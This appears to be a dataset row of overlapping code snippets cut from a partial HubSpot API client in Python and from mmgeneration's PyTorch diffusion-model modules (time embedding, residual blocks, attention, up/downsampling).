data=payload, params=querystring ) print(response.text) ##### DEAL APIS ##### # create deal", "querystring = { 'vid-offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request(", "{ 'offset': '0', 'count': '10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url,", "def get_all_contacts_from_a_list(self, list_id): url = self._lists_url + '/' + list_id + '/contacts/all' querystring", "pass ##### CONTACT APIS ##### def get_contact_by_id(): pass # read all companies def", "##### def get_account_by_id(): pass # read all companies def get_all_accounts(): pass # create", "url, data=payload, params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id): url", "+ '/' + list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count': '100',", "'/' + list_id + '/add' querystring = { 'hapikey': '<KEY>', } payload =", "requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self,", "'portalId': 5225356, 'filters': [], }) response = requests.request( 'POST', url, data=payload, params=querystring )", "requests.request( 'GET', url, params=querystring ) print(response.text) # create contact def create_contact(): pass #", "}) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass def delete_list():", "[], }) response = requests.request( 'POST', url, data=payload, params=querystring ) print(response.text) pass def", "# read all companies def get_all_accounts(): pass # create company in hubspot def", "create_contact(): pass # update contact def update_contact(): pass # deleting contact def delete_contact():", "pass # update contact def update_contact(): pass # deleting contact def delete_contact(): pass", "= 'https://api.hubapi.com/contacts/v1/lists' pass def get_access_token(self, refresh_token): pass def update_access_token(): pass ##### ACCOUNT APIS", "'0', 'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring )", "{ 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response = requests.request(", ") print(response.text) def get_list_by_id(self, list_id): url = self._lists_url + '/' + list_id querystring", "# create company in hubspot def create_account(): pass # update company def update_account():", "'<KEY>', } payload = ujson.dumps({ vids: array_of_ids }) response = requests.request( 'POST', url,", "APIS ##### def get_contact_by_id(): pass # read all companies def get_all_contacts(): url =", "self._lists_url + '/' + list_id + '/contacts/all' querystring = { 'vidOffset': '0', 'count':", "response = requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url", "refresh_token): self.hub_id = hub_id self.refresh_token = refresh_token self.access_token = self.get_access_token(refresh_token) self._lists_url = 'https://api.hubapi.com/contacts/v1/lists'", "update contact def update_contact(): pass # deleting contact def delete_contact(): pass def get_associated_deals_for_contact():", "'POST', url, data=payload, params=querystring ) print(response.text) pass def delete_list(): pass def get_all_contacts_from_a_list(self, list_id):", "get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass # read all companies", "pass # update company def update_account(): # pass def add_contact_to_account(): pass def get_associated_deals_for_account():", ") print(response.text) ##### DEAL APIS ##### # create deal def get_deal_owner_by_id(): # check", "= requests.request( 'GET', url, params=querystring ) print(response.text) def get_list_by_id(self, list_id): url = self._lists_url", "get_all_static_lists(): url = self._lists_url querystring = { 'offset': '0', 'count': '10', 'hapikey': '<KEY>',", "'hapikey': '<KEY>', } payload = ujson.dumps({ 'name': list_name, 'dynamic': True, 'portalId': 5225356, 'filters':", "companies def get_all_accounts(): pass # create company in hubspot def create_account(): pass #", "list_name): url = self._lists_url querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({", "'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self,", "response = requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id, array_of_ids): url", "# check deal id or owner id pass def create_deal(): pass def associate_contact_to_deal():", "add_contact_to_account(): pass def get_associated_deals_for_account(): pass ##### CONTACT APIS ##### def get_contact_by_id(): pass #", "'10', 'hapikey': '<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) #", "id or owner id pass def create_deal(): pass def associate_contact_to_deal(): pass def associate_account_to_deal():", "'<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) def add_contacts_in_a_static_list(self, list_id,", "= requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url +", "'/contacts/all' querystring = { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response =", "= { 'vidOffset': '0', 'count': '100', 'hapikey': '<KEY>', } response = requests.request( 'GET',", "+ '/' + list_id querystring = { 'hapikey': '<KEY>', } response = requests.request(", "requests.request( 'GET', url, params=querystring ) print(response.text) def get_all_dynamic_lists(): url = self._lists_url + '/dynamic'", "'<KEY>', } response = requests.request( 'GET', url, params=querystring ) print(response.text) # create contact", "params=querystring ) print(response.text) def create_static_list(self, list_name): url = self._lists_url querystring = { 'hapikey':", "+ '/add' querystring = { 'hapikey': '<KEY>', } payload = ujson.dumps({ vids: array_of_ids", "APIS ##### def get_all_static_lists(): url = self._lists_url querystring = { 'offset': '0', 'count':", "params=querystring ) print(response.text) def create_dynamic_list(): url = self._lists_url querystring = { 'hapikey': '<KEY>',", "array_of_ids): url = self._lists_url + '/' + list_id + '/add' querystring = {" ]
[ "Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the activation layer. Defaults", "]``, one per batch element. dim (int): The dimension of the embedding. max_period", "constant_init from mmgen.models.builder import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes", "nn.Conv2d(in_channels, in_channels, 3, 1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation.", "from copy import deepcopy from functools import partial import mmcv import numpy as", "as the swish function. Args: input (bool, optional): Use inplace operation or not.", "0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if", "v = torch.chunk(qkv, 3, dim=1) scale = 1 / np.sqrt(np.sqrt(channel)) weight = torch.einsum('bct,bcs->bts',", "to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads =", "qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv)", "the output channels will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict,", "and re-scale normalization results. Otherwise, embedding results will directly add to input of", "embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat( [embedding,", "the input feature map. embedding_channels (int): Number of channels of the input embedding.", "after downsampling. \"\"\" return self.downsample(x) @MODULES.register_module() class DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the", "torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time embedding", "upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest')", "an additional convolution layer after upsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels,", "numpy as np import torch import torch.nn as nn import torch.nn.functional as F", "weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self,", "reference to Two level embedding. First embedding time by an embedding function, then", "as ``[bz, ]``, one per batch element. dim (int): The dimension of the", "torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position", "\"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module()", "half = dim // 2 freqs = torch.exp( -np.log(max_period) * torch.arange(start=0, end=half, dtype=torch.float32)", "freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat(", "self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y): \"\"\"Forward function. Args: x", "Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared time embedding or", "after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x = self.conv(x)", "input feature map. num_heads (int, optional): Number of heads in the attention. norm_cfg", "F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows spatial position to attend", "self.conv_2(x) return x + shortcut def init_weights(self): # apply zero init to last", "# Copyright (c) OpenMMLab. All rights reserved. from copy import deepcopy from functools", "deepcopy(norm_cfg) _, norm_1 = build_norm_layer(_norm_cfg, in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels,", "def forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x =", "norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg,", "convolution operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__()", "-1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self):", "nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x)", "for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin',", "shape as ``[bz, ]``, one per batch element. dim (int): The dimension of", "config for the normalization layers. Defaults too ``dict(type='GN', num_groups=32)``. act_cfg (dict, optional): The", "mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils import constant_init from", "num_heads (int, optional): Number of heads in the attention. norm_cfg (dict, optional): Config", "shortcut_kernel_size in [ 1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`,", "x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads,", "feature map. embedding_channels (int): The channel number of the output embedding. embedding_mode (str,", "\"\"\" b, c, *spatial = x.shape x = x.reshape(b, c, -1) qkv =", "support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut = out_channels", "DenoisingUpsample(nn.Module): \"\"\"Upsampling operation used in the denoising network. Allows users to apply an", "in_channels self.embedding_layer = nn.Sequential( build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_output)) def forward(self, x, y): \"\"\"Forward function.", "block allows spatial position to attend to each other. Originally ported from here,", "self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels *", "to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The config for the", "as `[bz, dim]`. \"\"\" half = dim // 2 freqs = torch.exp( -np.log(max_period)", ":1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward function for time embedding layer.", "feature map to be downsampled. with_conv (bool, optional): Whether use convolution operation for", "embedding_channels)) # add `dim` to embedding config embedding_cfg_ = dict(dim=in_channels) if embedding_cfg is", "used in the denoising network. Allows users to apply an additional convolution layer", "attention. norm_cfg (dict, optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\"", "(1 + scale) + shift else: x = self.norm(x + embedding) return x", "to upsample. Returns: torch.Tensor: Feature map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2,", "case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of the input feature map.", "Copyright (c) OpenMMLab. All rights reserved. from copy import deepcopy from functools import", "def forward_shortcut(self, x): if self.learnable_shortcut: return self.shortcut(x) return x def forward(self, x, y):", "else 0 self.shortcut = nn.Conv2d( in_channels, out_channels, shortcut_kernel_size, padding=shortcut_padding) self.init_weights() def forward_shortcut(self, x):", "embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)): super().__init__() self.blocks = nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels))", "Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for the shortcut", "\"\"\" embedding = self.embedding_layer(y)[:, :, None, None] if self.use_scale_shift: scale, shift = torch.chunk(embedding,", "to each other. Originally ported from here, but adapted to the N-d case.", "as np import torch import torch.nn as nn import torch.nn.functional as F from", "and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for ' f'torch <", "Embedding layer will be added with the input before normalization operation. Defaults to", "channels of the input feature map. embedding_channels (int) Number of channels of the", "shared label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut =", "forward(self, x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature map to", "map the output of normalization layer to ``out * (1 + scale) +", "= nn.Sequential( nn.Linear(in_channels, embedding_channels), build_activation_layer(act_cfg), nn.Linear(embedding_channels, embedding_channels)) # add `dim` to embedding config", "channel number of the input feature map. embedding_channels (int): The channel number of", "deepcopy from functools import partial import mmcv import numpy as np import torch", "import MODULES, build_module class EmbedSequential(nn.Sequential): \"\"\"A sequential module that passes timestep embeddings to", "label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x)", "in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift = use_scale_shift _, self.norm", "Feature map after attention. \"\"\" b, c, *spatial = x.shape x = x.reshape(b,", "conv layers will be added. Args: in_channels (int): Number of channels of the", "time embedding. Defaults to 'sin'. embedding_cfg (dict, optional): Config for time embedding. Defaults", "function, element-wise. The SiLU function is also known as the swish function. Args:", "norm_cfg (dict, optional): Config for the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg", "convolution for downsample operation. Args: in_channels (int): Number of channels of the input", "adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels (int): Channels of", "the denoising network. Allows users to apply an additional convolution layer after the", "(torch.Tensor): Timestep to embedding. 1-D tensor shape as ``[bz, ]``, one per batch", "super().__init__() self.use_scale_shift = use_scale_shift _, self.norm = build_norm_layer(norm_cfg, in_channels) embedding_output = in_channels *", "is not None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else:", "receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps", "self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h =", "feature map. embedding_channels (int): Number of channels of the input embedding. use_scale_shift_norm (bool):", "version of \\'SiLU\\' is not supported for ' f'torch < 1.6.0, found \\'{torch.version}\\'.')", "y (torch.Tensor): Shared time embedding or shared label embedding. Returns: torch.Tensor : Output", "not defined, the output channels will equal to the `in_channels`. Defaults to `None`.", "\"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift =", "\"\"\"Downsampling operation used in the denoising network. Support average pooling and convolution for", "None: embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only", "before normalization operation. Defaults to True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32),", "embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])], dim=-1) return embedding def forward(self, t): \"\"\"Forward", "use convolution operation for downsampling. Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True):", "then feed to neural networks. Args: in_channels (int): The channel number of the", "Embedding results shape as `[bz, dim]`. \"\"\" half = dim // 2 freqs", "y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map tensor. y (torch.Tensor): Shared", "+ x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding", "it as an extra input. Modified from https://github.com/openai/improved-diffusion/blob/main/improved_diffusion/unet.py#L35 \"\"\" def forward(self, x, y):", "map after upsampling. \"\"\" x = F.interpolate(x, scale_factor=2, mode='nearest') if self.with_conv: x =", "sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep embeddings. Args: timesteps (torch.Tensor): Timestep to embedding.", "torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for the denoising", "= 1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels, out_channels,", "act_cfg (dict, optional): Config for the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift", "constant_init(self.conv_2[-1], 0) @MODULES.register_module() class NormWithEmbedding(nn.Module): \"\"\"Nornalization with embedding layer. If `use_scale_shift == True`,", "to ``1``. \"\"\" def __init__(self, in_channels, embedding_channels, use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU',", "self.conv_1(x) x = self.norm_with_embedding(x, y) x = self.conv_2(x) return x + shortcut def", "is also known as the swish function. Args: input (bool, optional): Use inplace", "function is also known as the swish function. Args: input (bool, optional): Use", "self.QKVAttention(qkv) h = h.reshape(b, -1, h.shape[-1]) h = self.proj(h) return (h + x).reshape(b,", "self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class", "the normalization operation. Defaults to `dict(type='GN', num_groups=32)`. act_cfg (dict, optional): Config for the", "embedding results will directly add to input of normalization layer. Args: in_channels (int):", "nn.Dropout(dropout), nn.Conv2d(out_channels, out_channels, 3, padding=1) ] self.conv_2 = nn.Sequential(*conv_2) assert shortcut_kernel_size in [", "output of normalization layer to ``out * (1 + scale) + shift``. Otherwise,", "in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv = True self.conv = nn.Conv2d(in_channels, in_channels, 3,", "label embedding. Returns: torch.Tensor : Output feature map tensor. \"\"\" embedding = self.embedding_layer(y)[:,", "denoising network. Support average pooling and convolution for downsample operation. Args: in_channels (int):", "the activation layer. Defaults to `dict(type='SiLU', inplace=False)`. use_scale_shift (bool): If True, the output", "optional): Number of output channels of the ResBlock. If not defined, the output", "\"\"\" def forward(self, x, y): for layer in self: if isinstance(layer, DenoisingResBlock): x", "channels will equal to the `in_channels`. Defaults to `None`. norm_cfg (dict, optional): The", "shortcut_padding = 1 if shortcut_kernel_size == 3 else 0 self.shortcut = nn.Conv2d( in_channels,", "Timestep to embedding. 1-D tensor shape as ``[bz, ]``, one per batch element.", "torch.einsum('bts,bcs->bct', weight, v) return weight def forward(self, x): \"\"\"Forward function for multi head", "optional): Use inplace operation or not. Defaults to `False`. \"\"\" def __init__(self, inplace=False):", "Defaults to `False`. \"\"\" def __init__(self, inplace=False): super().__init__() if torch.__version__ < '1.6.0' and", "super().__init__() out_channels = in_channels if out_channels is None else out_channels _norm_cfg = deepcopy(norm_cfg)", "<reponame>plutoyuxie/mmgeneration<gh_stars>100-1000 # Copyright (c) OpenMMLab. All rights reserved. from copy import deepcopy from", "1, 1) def forward(self, x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor):", "= qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h = self.QKVAttention(qkv) h = h.reshape(b, -1,", "ValueError('Only support `SIN` for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps,", "torch.arange(start=0, end=half, dtype=torch.float32) / half).to(device=timesteps.device) args = timesteps[:, None].float() * freqs[None] embedding =", "from here, but adapted to the N-d case. https://github.com/hojonathanho/diffusion/blob/1e0dceb3b3495bbe19116a5e1b3596cd0706c543/diffusion_tf/models/unet.py#L66. # noqa Args: in_channels", "embedding function, then feed to neural networks. Args: in_channels (int): The channel number", "act_cfg (dict, optional): The config for the activation layers. Defaults to ``dict(type='SiLU', inplace=False)``.", "the input feature map. embedding_channels (int): The channel number of the output embedding.", "True. \"\"\" def __init__(self, in_channels, embedding_channels, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), use_scale_shift=True): super().__init__() self.use_scale_shift", "embedding_output)) def forward(self, x, y): \"\"\"Forward function. Args: x (torch.Tensor): Input feature map", "weight, v) return weight def forward(self, x): \"\"\"Forward function for multi head attention.", "use_scale_shift_norm, dropout, out_channels=None, norm_cfg=dict(type='GN', num_groups=32), act_cfg=dict(type='SiLU', inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if", "super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv = nn.Conv1d(in_channels, in_channels", "embedding. First embedding time by an embedding function, then feed to neural networks.", "return x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block", "{shortcut_kernel_size}.') self.learnable_shortcut = out_channels != in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size", "[ 1, 3 ], ('Only support `1` and `3` for `shortcut_kernel_size`, but '", "torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding = torch.cat( [embedding, torch.zeros_like(embedding[:, :1])],", "init_weights(self): # apply zero init to last conv layer constant_init(self.conv_2[-1], 0) @MODULES.register_module() class", "copy import deepcopy from functools import partial import mmcv import numpy as np", "= self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in", "None. act_cfg (dict, optional): Config for activation layer. Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\"", "normalization layer to ``out * (1 + scale) + shift``. Otherwise, the output", "of Embedding layer will be split to 'scale' and 'shift' and map the", "Number of channels of the input embedding. norm_cfg (dict, optional): Config for the", "self.downsample = nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self,", "in_channels) conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 =", "as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer, build_norm_layer from mmcv.cnn.utils", "dropout layers. out_channels (int, optional): Number of output channels of the ResBlock. If", "else: x = self.norm(x + embedding) return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation", "the denoising network. If `in_channels` not equals to `out_channels`, a learnable shortcut with", "operation. Args: x (torch.Tensor): Feature map to downsample. Returns: torch.Tensor: Feature map after", "network. If `in_channels` not equals to `out_channels`, a learnable shortcut with conv layers", "shift = torch.chunk(embedding, 2, dim=1) x = self.norm(x) x = x * (1", "-1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b * self.num_heads, -1, qkv.shape[2]) h =", "the attention. norm_cfg (dict, optional): Config for normalization layer. Default to ``dict(type='GN', num_groups=32)``", "in_channels * 3, 1) self.proj = nn.Conv1d(in_channels, in_channels, 1) self.init_weights() @staticmethod def QKVAttention(qkv):", "activation layers. Defaults to ``dict(type='SiLU', inplace=False)``. shortcut_kernel_size (int, optional): The kernel size for", "Defaults to ``dict(type='SiLU', inplace=False)``. \"\"\" def __init__(self, in_channels, embedding_channels, embedding_mode='sin', embedding_cfg=None, act_cfg=dict(type='SiLU', inplace=False)):", "timesteps. Returns: torch.Tensor: Timesteps embedding. \"\"\" return self.blocks(self.embedding_fn(t)) @MODULES.register_module() class DenoisingResBlock(nn.Module): \"\"\"Resblock for", "(1 + scale) + shift``. Otherwise, the output of Embedding layer will be", "shortcut with conv layers will be added. Args: in_channels (int): Number of channels", "if isinstance(layer, DenoisingResBlock): x = layer(x, y) else: x = layer(x) return x", "' f'torch < 1.6.0, found \\'{torch.version}\\'.') self.inplace = inplace def forward(self, x): \"\"\"Forward", "The channel number of the output embedding. embedding_mode (str, optional): Embedding mode for", "in_channels (int): The channel number of the input feature map. embedding_channels (int): The", "for normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN',", "= x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv = qkv.reshape(b", "conv_1 = [ norm_1, build_activation_layer(act_cfg), nn.Conv2d(in_channels, out_channels, 3, padding=1) ] self.conv_1 = nn.Sequential(*conv_1)", "Args: x (torch.Tensor): Feature map to upsample. Returns: torch.Tensor: Feature map after upsampling.", "(torch.Tensor): Input feature map. Returns: torch.Tensor: Feature map after attention. \"\"\" b, c,", "init_weights(self): constant_init(self.proj, 0) @MODULES.register_module() class TimeEmbedding(nn.Module): \"\"\"Time embedding layer, reference to Two level", "embedding_cfg_.update(embedding_cfg) if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support", "apply an additional convolution layer after upsampling. Defaults to `True`. \"\"\" def __init__(self,", "Returns: torch.Tensor : Output feature map tensor. \"\"\" shortcut = self.forward_shortcut(x) x =", "position to attend to each other. Originally ported from here, but adapted to", "normalization layer. Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)):", "to input of normalization layer. Args: in_channels (int): Number of channels of the", "if embedding_mode.upper() == 'SIN': self.embedding_fn = partial(self.sinusodial_embedding, **embedding_cfg_) else: raise ValueError('Only support `SIN`", "!= in_channels if self.learnable_shortcut: shortcut_padding = 1 if shortcut_kernel_size == 3 else 0", "heads in the attention. norm_cfg (dict, optional): Config for normalization layer. Default to", "x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature map to upsample.", "= nn.Conv2d(in_channels, in_channels, 3, 2, 1) else: self.downsample = nn.AvgPool2d(stride=2) def forward(self, x):", "be downsampled. with_conv (bool, optional): Whether apply an additional convolution layer after upsampling.", "Defaults to `True`. \"\"\" def __init__(self, in_channels, with_conv=True): super().__init__() if with_conv: self.with_conv =", "map to be downsampled. with_conv (bool, optional): Whether use convolution operation for downsampling.", "x * torch.sigmoid(x) return F.silu(x, inplace=self.inplace) @MODULES.register_module() class MultiHeadAttention(nn.Module): \"\"\"An attention block allows", "forward(self, t): \"\"\"Forward function for time embedding layer. Args: t (torch.Tensor): Input timesteps.", "operation used in the denoising network. Support average pooling and convolution for downsample", "SiLU function is also known as the swish function. Args: input (bool, optional):", "nn import torch.nn.functional as F from mmcv.cnn import ACTIVATION_LAYERS from mmcv.cnn.bricks import build_activation_layer,", "= self.proj(h) return (h + x).reshape(b, c, *spatial) def init_weights(self): constant_init(self.proj, 0) @MODULES.register_module()", "embedding, ' f'but receive {embedding_mode}.') @staticmethod def sinusodial_embedding(timesteps, dim, max_period=10000): \"\"\"Create sinusoidal timestep", "Default to ``dict(type='GN', num_groups=32)`` \"\"\" def __init__(self, in_channels, num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads", "**embedding_cfg_) else: raise ValueError('Only support `SIN` for time embedding, ' f'but receive {embedding_mode}.')", "Number of channels of the input embedding. use_scale_shift_norm (bool): Whether use scale-shift-norm in", "return x @MODULES.register_module() class DenoisingDownsample(nn.Module): \"\"\"Downsampling operation used in the denoising network. Support", "results will be chunked and used to re-shift and re-scale normalization results. Otherwise,", "input feature map. embedding_channels (int) Number of channels of the input embedding. norm_cfg", "inplace=False), shortcut_kernel_size=1): super().__init__() out_channels = in_channels if out_channels is None else out_channels _norm_cfg", "(bool): Whether use scale-shift-norm in `NormWithEmbedding` layer. dropout (float): Probability of the dropout", "num_heads=1, norm_cfg=dict(type='GN', num_groups=32)): super().__init__() self.num_heads = num_heads _, self.norm = build_norm_layer(norm_cfg, in_channels) self.qkv", "('Only support `1` and `3` for `shortcut_kernel_size`, but ' f'receive {shortcut_kernel_size}.') self.learnable_shortcut =", "Probability of the dropout layers. out_channels (int, optional): Number of output channels of", "Defaults to ``10000``. Returns: torch.Tensor: Embedding results shape as `[bz, dim]`. \"\"\" half", "scale) weight = torch.softmax(weight.float(), dim=-1).type(weight.dtype) weight = torch.einsum('bts,bcs->bct', weight, v) return weight def", "and convolution for downsample operation. Args: in_channels (int): Number of channels of the", "operation used in the denoising network. Allows users to apply an additional convolution", "Tensor after activation. \"\"\" if torch.__version__ < '1.6.0': return x * torch.sigmoid(x) return", "tensor shape as ``[bz, ]``, one per batch element. dim (int): The dimension", "* freqs[None] embedding = torch.cat([torch.cos(args), torch.sin(args)], dim=-1) if dim % 2: embedding =", "x = layer(x) return x @ACTIVATION_LAYERS.register_module() class SiLU(nn.Module): r\"\"\"Applies the Sigmoid Linear Unit", "def forward(self, x): \"\"\"Forward function for upsampling operation. Args: x (torch.Tensor): Feature map", "optional): Config for time embedding. Defaults to None. act_cfg (dict, optional): Config for", "embedding results will be chunked and used to re-shift and re-scale normalization results.", "*spatial = x.shape x = x.reshape(b, c, -1) qkv = self.qkv(self.norm(x)) qkv =", "raise ValueError('Only support `SIN` for time embedding, ' f'but receive {embedding_mode}.') @staticmethod def", "add to input of normalization layer. Args: in_channels (int): Number of channels of", "forward(self, x): \"\"\"Forward function for multi head attention. Args: x (torch.Tensor): Input feature", "layer. If `use_scale_shift == True`, embedding results will be chunked and used to", "< '1.6.0' and inplace: mmcv.print_log('Inplace version of \\'SiLU\\' is not supported for '", "functools import partial import mmcv import numpy as np import torch import torch.nn", "embedding_cfg (dict, optional): Config for time embedding. Defaults 